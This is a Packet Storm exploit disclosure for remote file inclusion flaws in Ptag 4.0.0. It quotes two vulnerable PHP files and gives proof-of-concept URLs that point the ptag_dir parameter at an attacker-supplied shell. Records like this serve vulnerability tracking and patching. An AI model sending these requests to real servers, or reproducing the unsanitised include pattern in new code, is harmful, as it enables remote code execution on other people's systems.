Ptag 4.0.0 Remote File Inclusion

2009-12-21T00:00:00
ID PACKETSTORM:84079
Type packetstorm
Reporter cr4wl3r
Modified 2009-12-21T00:00:00

Description

                                        
                                            `##################################################################  
## Exploit Title: Ptag <= 4.0.0 Multiple RFI Exploit ##  
## Date: 19-12-2009 ##  
## Author: cr4wl3r ##  
## Software Link: http://sourceforge.net/projects/ptag/ ##  
## Version: N/A ##  
## Tested on: GNU/LINUX ##  
##################################################################  
  
  
~ Code [session.php]  
  
<?php  
//Plottable Tagboard Systems Version 4.0.0 - ROLAND  
//Session handling File  
  
require_once(ptag_dir."lib/php/crossSession.php");  
class ptag_session extends crossSession{  
public function __construct(){  
global $ptag_sql;  
$this -> sql_table = ptag_prefix."session";  
$this -> cookie_name = ptag_prefix."session";  
  
//If RSS mode, switch session to non-viewed tracker.  
if (ptag_output == "rss"){  
parent::__construct($ptag_sql, sha1(""));  
}  
else{  
parent::__construct($ptag_sql);  
}  
}  
}  
?>  
  
~ PoC  
  
[Ptag_path]/lib/session.php?ptag_dir=[Shell]  
  
  
  
  
~ Code [sql.php]  
  
<?php  
//Plottable Tagboard Systems Version 4.0.0 - ROLAND  
//Extending MySQL class  
  
require_once(ptag_dir."lib/php/ezmySQL.php");  
class ptag_sql extends ezmySQL{  
  
public function __construct(){  
parent::__construct(ptag_mysql_host, ptag_mysql_user, ptag_mysql_pass, ptag_mysql_db);  
}  
  
protected function error_handler($err){  
$error = "A MySQL error has occured: (".$err["errno"].") ".$err["error"]." when executing the query: ".$err["query"];  
  
return ptag_exception::handle_error($error, $err["line"], $err["file"], $err["class"], $err["method"]);  
}  
}  
?>  
  
  
~ PoC  
  
[Ptag_path]/lib/sql.php?ptag_dir=[Shell]  
  
`